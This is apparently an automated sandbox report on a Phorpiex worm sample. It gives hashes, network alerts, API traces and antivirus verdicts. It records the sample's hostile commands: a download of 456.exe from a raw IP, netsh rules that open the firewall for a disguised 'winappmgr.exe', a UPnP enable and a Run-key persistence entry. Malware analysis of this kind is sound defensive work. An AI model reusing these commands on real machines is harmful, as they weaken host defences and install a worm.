Summary | ZeroBOX

a.exe

Worm Phorpiex UPX Malicious Library Malicious Packer PE File PE32
Category Machine Started Completed
FILE s1_win7_x6401 Aug. 15, 2021, 12:30 p.m. Aug. 15, 2021, 12:51 p.m.
Size 5.0KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 627fc88e4e32885ef3eb655f353d3d73
SHA256 789a247aac003f6562a3809a60d214843d77f8c0e0fa24ba479a229a4b86cf69
CRC32 94FC0477
ssdeep 96:1mCmaBINl1oulwdFf4kYyPtboynuVYCt:1GliuOdJ4kYyP1oyn0L
PDB Path gf6d576s4d576f87g98f6d54sd57f67g657s6d576ftgyutfdd6d6u6duyyds5yssd
Yara
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)
  • Win_Worm_Phorpiex - a worm which spreads via removable drives and network drives.

Name Response Post-Analysis Lookup
stun.jabbim.cz 88.86.102.51
IP Address Status Action
164.124.101.2 Active Moloch
185.215.113.22 Active Moloch
79.141.72.138 Active Moloch
79.141.72.156 Active Moloch
79.141.72.52 Active Moloch
88.86.102.51 Active Moloch
88.86.102.52 Active Moloch

Suricata Alerts

Flow SID Signature Category
UDP 192.168.56.101:61481 -> 88.86.102.51:3478 2016149 ET INFO Session Traversal Utilities for NAT (STUN Binding Request) Attempted User Privilege Gain
TCP 185.215.113.22:80 -> 192.168.56.101:49198 2400024 ET DROP Spamhaus DROP Listed Traffic Inbound group 25 Misc Attack
UDP 192.168.56.101:61481 -> 88.86.102.52:3479 2033078 ET INFO Session Traversal Utilities for NAT (STUN Binding Request On Non-Standard High Port) Attempted User Privilege Gain
UDP 88.86.102.52:3479 -> 192.168.56.101:61481 2018908 ET INFO Session Traversal Utilities for NAT (STUN Binding Response) Generic Protocol Command Decode
UDP 88.86.102.51:3478 -> 192.168.56.101:61481 2016150 ET INFO Session Traversal Utilities for NAT (STUN Binding Response) Attempted User Privilege Gain
UDP 88.86.102.51:3478 -> 192.168.56.101:61481 2018908 ET INFO Session Traversal Utilities for NAT (STUN Binding Response) Generic Protocol Command Decode
UDP 192.168.56.101:61481 -> 88.86.102.51:3478 2016149 ET INFO Session Traversal Utilities for NAT (STUN Binding Request) Attempted User Privilege Gain
UDP 192.168.56.101:61481 -> 88.86.102.51:3478 2018907 ET INFO Session Traversal Utilities for NAT (STUN Binding Request obsolete rfc 3489 CHANGE-REQUEST attribute change IP flag true change port flag true) Generic Protocol Command Decode
UDP 192.168.56.101:61481 -> 88.86.102.51:3478 2016149 ET INFO Session Traversal Utilities for NAT (STUN Binding Request) Attempted User Privilege Gain
UDP 192.168.56.101:61481 -> 88.86.102.51:3478 2016149 ET INFO Session Traversal Utilities for NAT (STUN Binding Request) Attempted User Privilege Gain
UDP 192.168.56.101:61481 -> 88.86.102.51:3478 2016149 ET INFO Session Traversal Utilities for NAT (STUN Binding Request) Attempted User Privilege Gain
UDP 192.168.56.101:61481 -> 88.86.102.51:3478 2018905 ET INFO Session Traversal Utilities for NAT (STUN Binding Request obsolete rfc 3489 CHANGE-REQUEST attribute change IP flag false change port flag true) Generic Protocol Command Decode
UDP 192.168.56.101:61481 -> 88.86.102.51:3478 2016149 ET INFO Session Traversal Utilities for NAT (STUN Binding Request) Attempted User Privilege Gain
UDP 192.168.56.101:61481 -> 88.86.102.51:3478 2016149 ET INFO Session Traversal Utilities for NAT (STUN Binding Request) Attempted User Privilege Gain
TCP 192.168.56.101:49198 -> 185.215.113.22:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 185.215.113.22:80 -> 192.168.56.101:49198 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.215.113.22:80 -> 192.168.56.101:49198 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

WriteConsoleA

buffer: No rules match the specified criteria.
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Ok.
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: No rules match the specified criteria.
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Ok.
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: IMPORTANT: Command executed successfully. However, "netsh firewall" is deprecated; use "netsh advfirewall firewall" instead. For more information on using "netsh advfirewall firewall" commands instead of "netsh firewall", see KB article 947709 at http://go.microsoft.com/fwlink/?linkid=121488 .
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Ok.
console_handle: 0x00000007
1 1 0
pdb_path gf6d576s4d576f87g98f6d54sd57f67g657s6d576ftgyutfdd6d6u6duyyds5yssd
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
packer Armadillo v1.71
suspicious_features Connection to IP address suspicious_request GET http://185.215.113.22/456.exe
request GET http://185.215.113.22/456.exe
ip 79.141.72.138
ip 79.141.72.156
ip 79.141.72.52
ip 88.86.102.51
ip 88.86.102.52
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceExW

total_number_of_free_bytes: 13651218432
free_bytes_available: 13651218432
root_path: C:\
total_number_of_bytes: 34252779520
1 1 0
file C:\Users\test22\AppData\Local\Temp\hhhhhhhhhhh.exe
Time & API Arguments Status Return Repeated

SetFileAttributesW

file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: C:\Users\test22\Windows Application Manager
filepath: C:\Users\test22\Windows Application Manager
1 1 0
cmdline cmd.exe /c netsh advfirewall firewall show rule name="c:\users\test22\windows application manager\winappmgr.exe" || netsh advfirewall firewall add rule action=allow profile=any protocol=any enable=yes direction=in name="c:\users\test22\windows application manager\winappmgr.exe" program="C:\Users\test22\Windows Application Manager\winappmgr.exe"
cmdline cmd.exe /c netsh advfirewall firewall show rule "Port 61480 c:\users\test22\windows application manager\winappmgr.exe" || netsh advfirewall firewall add rule name="Port 61480 c:\users\test22\windows application manager\winappmgr.exe" dir=in action=allow protocol=UDP localport=61480
cmdline "C:\Windows\System32\cmd.exe" /c netsh advfirewall firewall show rule "Port 61480 c:\users\test22\windows application manager\winappmgr.exe" || netsh advfirewall firewall add rule name="Port 61480 c:\users\test22\windows application manager\winappmgr.exe" dir=in action=allow protocol=UDP localport=61480
cmdline "C:\Windows\System32\cmd.exe" /c netsh advfirewall firewall show rule name="c:\users\test22\windows application manager\winappmgr.exe" || netsh advfirewall firewall add rule action=allow profile=any protocol=any enable=yes direction=in name="c:\users\test22\windows application manager\winappmgr.exe" program="C:\Users\test22\Windows Application Manager\winappmgr.exe"
cmdline "C:\Windows\System32\cmd.exe" /c netsh firewall set service type= upnp mode = enable
cmdline cmd.exe /c netsh firewall set service type= upnp mode = enable
file C:\Users\test22\AppData\Local\Temp\hhhhhhhhhhh.exe
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c netsh advfirewall firewall show rule name="c:\users\test22\windows application manager\winappmgr.exe" || netsh advfirewall firewall add rule action=allow profile=any protocol=any enable=yes direction=in name="c:\users\test22\windows application manager\winappmgr.exe" program="C:\Users\test22\Windows Application Manager\winappmgr.exe"
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c netsh advfirewall firewall show rule "Port 61480 c:\users\test22\windows application manager\winappmgr.exe" || netsh advfirewall firewall add rule name="Port 61480 c:\users\test22\windows application manager\winappmgr.exe" dir=in action=allow protocol=UDP localport=61480
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c netsh firewall set service type= upnp mode = enable
filepath: cmd.exe
1 1 0
Time & API Arguments Status Return Repeated

InternetReadFile

buffer: MZÿÿ¸@ິ Í!¸LÍ!This program cannot be run in DOS mode. $Ï'4¼‹FZï‹FZï‹FZï•ÏïžFZï•ÙïúFZff7ïFZff!ï’FZï‹F[ï}FZï•Þï¤FZï•ËïŠFZïRich‹FZïPELÜÒaà  ì|ÌT@À¯@|6€´lð°*@¬.textÕêì `.rdata
request_handle: 0x00cc000c
1 1 0
cmdline netsh firewall set service type= upnp mode = enable
cmdline cmd.exe /c netsh advfirewall firewall show rule name="c:\users\test22\windows application manager\winappmgr.exe" || netsh advfirewall firewall add rule action=allow profile=any protocol=any enable=yes direction=in name="c:\users\test22\windows application manager\winappmgr.exe" program="C:\Users\test22\Windows Application Manager\winappmgr.exe"
cmdline cmd.exe /c netsh advfirewall firewall show rule "Port 61480 c:\users\test22\windows application manager\winappmgr.exe" || netsh advfirewall firewall add rule name="Port 61480 c:\users\test22\windows application manager\winappmgr.exe" dir=in action=allow protocol=UDP localport=61480
cmdline netsh advfirewall firewall add rule action=allow profile=any protocol=any enable=yes direction=in name="c:\users\test22\windows application manager\winappmgr.exe" program="C:\Users\test22\Windows Application Manager\winappmgr.exe"
cmdline "C:\Windows\System32\cmd.exe" /c netsh advfirewall firewall show rule "Port 61480 c:\users\test22\windows application manager\winappmgr.exe" || netsh advfirewall firewall add rule name="Port 61480 c:\users\test22\windows application manager\winappmgr.exe" dir=in action=allow protocol=UDP localport=61480
cmdline "C:\Windows\System32\cmd.exe" /c netsh advfirewall firewall show rule name="c:\users\test22\windows application manager\winappmgr.exe" || netsh advfirewall firewall add rule action=allow profile=any protocol=any enable=yes direction=in name="c:\users\test22\windows application manager\winappmgr.exe" program="C:\Users\test22\Windows Application Manager\winappmgr.exe"
cmdline netsh advfirewall firewall show rule name="c:\users\test22\windows application manager\winappmgr.exe"
cmdline netsh advfirewall firewall add rule name="Port 61480 c:\users\test22\windows application manager\winappmgr.exe" dir=in action=allow protocol=UDP localport=61480
cmdline netsh advfirewall firewall show rule "Port 61480 c:\users\test22\windows application manager\winappmgr.exe"
cmdline "C:\Windows\System32\cmd.exe" /c netsh firewall set service type= upnp mode = enable
cmdline cmd.exe /c netsh firewall set service type= upnp mode = enable
host 185.215.113.22
host 79.141.72.138
host 79.141.72.156
host 79.141.72.52
host 88.86.102.52
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Windows Application Manager reg_value C:\Users\test22\Windows Application Manager\winappmgr.exe
cmdline cmd.exe /c netsh advfirewall firewall show rule name="c:\users\test22\windows application manager\winappmgr.exe" || netsh advfirewall firewall add rule action=allow profile=any protocol=any enable=yes direction=in name="c:\users\test22\windows application manager\winappmgr.exe" program="C:\Users\test22\Windows Application Manager\winappmgr.exe"
cmdline cmd.exe /c netsh advfirewall firewall show rule "Port 61480 c:\users\test22\windows application manager\winappmgr.exe" || netsh advfirewall firewall add rule name="Port 61480 c:\users\test22\windows application manager\winappmgr.exe" dir=in action=allow protocol=UDP localport=61480
cmdline netsh advfirewall firewall add rule action=allow profile=any protocol=any enable=yes direction=in name="c:\users\test22\windows application manager\winappmgr.exe" program="C:\Users\test22\Windows Application Manager\winappmgr.exe"
cmdline "C:\Windows\System32\cmd.exe" /c netsh advfirewall firewall show rule "Port 61480 c:\users\test22\windows application manager\winappmgr.exe" || netsh advfirewall firewall add rule name="Port 61480 c:\users\test22\windows application manager\winappmgr.exe" dir=in action=allow protocol=UDP localport=61480
cmdline "C:\Windows\System32\cmd.exe" /c netsh advfirewall firewall show rule name="c:\users\test22\windows application manager\winappmgr.exe" || netsh advfirewall firewall add rule action=allow profile=any protocol=any enable=yes direction=in name="c:\users\test22\windows application manager\winappmgr.exe" program="C:\Users\test22\Windows Application Manager\winappmgr.exe"
cmdline netsh advfirewall firewall show rule name="c:\users\test22\windows application manager\winappmgr.exe"
cmdline netsh advfirewall firewall add rule name="Port 61480 c:\users\test22\windows application manager\winappmgr.exe" dir=in action=allow protocol=UDP localport=61480
cmdline netsh advfirewall firewall show rule "Port 61480 c:\users\test22\windows application manager\winappmgr.exe"
file C:\Users\test22\AppData\Local\Temp\hhhhhhhhhhh.exe:Zone.Identifier
Lionic Trojan.Win32.Generic.4!c
Elastic malicious (high confidence)
DrWeb Trojan.DownLoader41.11535
MicroWorld-eScan Trojan.GenericKD.37397742
FireEye Generic.mg.627fc88e4e32885e
Qihoo-360 Win32/Trojan.Generic.HwcBQD8A
ALYac Gen:Heur.Mint.Zard.39
Cylance Unsafe
Sangfor Trojan.Win32.Save.a
Alibaba Trojan:Win32/XPACK.a375ca36
Cybereason malicious.e4e328
BitDefenderTheta Gen:NN.ZexaF.34058.auW@aGHFmWdi
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of Generik.ENSYFDJ
APEX Malicious
Paloalto generic.ml
Kaspersky HEUR:Trojan.Win32.Generic
BitDefender Trojan.GenericKD.37397742
Avast Win32:Malware-gen
Rising Trojan.Generic@ML.100 (RDMK:pENf5AL3BElD7ufUbstsaw)
Ad-Aware Trojan.GenericKD.37397742
Sophos Mal/Generic-S
McAfee-GW-Edition BehavesLike.Win32.Generic.zt
Emsisoft Trojan.GenericKD.37397742 (B)
SentinelOne Static AI - Malicious PE
Webroot W32.Malware.Gen
Avira TR/Crypt.XPACK.Gen
MAX malware (ai score=100)
Kingsoft Win32.Troj.Undef.(kcloud)
Microsoft Trojan:Win32/Sabsik.FL.B!ml
Gridinsoft Trojan.Win32.Downloader.oa
Arcabit Trojan.Generic.D23AA4EE
GData Trojan.GenericKD.37397742
Cynet Malicious (score: 100)
Acronis suspicious
McAfee RDN/Generic.grp
VBA32 suspected of Trojan.Downloader.gen
TrendMicro-HouseCall TROJ_GEN.R002H0CHD21
Tencent Win32.Trojan.Generic.Wncx
Ikarus Trojan.Crypt
Fortinet W32/PossibleThreat
AVG Win32:Malware-gen
Panda Trj/GdSda.A
CrowdStrike win/malicious_confidence_100% (W)